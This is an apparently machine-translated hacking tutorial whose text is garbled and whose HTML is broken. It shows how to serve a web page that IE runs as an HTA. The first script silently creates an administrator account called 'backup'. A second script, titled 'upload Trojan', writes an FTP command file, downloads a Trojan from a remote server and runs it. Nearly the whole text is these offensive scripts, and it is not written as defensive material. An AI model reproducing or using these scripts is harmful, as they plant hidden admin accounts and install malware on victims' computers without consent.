---------------------------------------------
First, establish a user
-------------------------------------------------- ------------------
1. Create a new web address in your web directory, the code is as follows
This is a add user program!
IT's Will Add An Administrator On Your Computer!
User: Backup
PWD: HX068
'127.0.0.1 is your home page address
body>
2. Build an add.add file in your web directory, the content is as follows
Set wshshell = creteObject ("wscript.shell")
a = wshshell.run ("cmd.exe / c net user backup hx068 / add", 0)
B = wshshell.run ("cmd.exe / c net localgroup administrators backup / add", 0)
WINDOW.CLOSE
script>
html>
3, to ~ Control Silver - Management Tool ~ Internet Server Management, find your web site ~ right button ~ property ~ http header
, Click on the file type of the lower MIME map ~~~ new type ~~~
Enter ".add" in the associated extension (excluding quotation marks), enter "Application / HTA" ~~~ all the way in the content type. OK
Now browse with IE
Http://127.0.0.1/add.htm, the computer will add a U / P: Backup / HX068 user, permission is an administrator.
----------------------------------------
Second, upload Trojan
Modify Add.Add, the content is as follows
DIM FSO, TF, WSH
SET FSO = CreateObject ("scripting.filesystemObject")
SET WSH = CreateObject ("wscript.shell")
Set tf = fso.createtextfile ("ftp.txt", true)
Tf.Write "open 127.0.0.1" & chr (13) & chr (10)
Tf.write "Your FTP User Name" & Chr (13) & Chr (10)
Tf.write "Your FTP Password" & Chr (13) & Chr (10)
Tf.write "GET Trojan file name extension" & chr (13) & chr (10) tf.write "BYE"
Tf.close
A = wsh.run ("ftp -s: ftp.txt", 0, true)
B = wsh.run ("Trojan file name extension")
WINDOW.CLOSE
script>
html>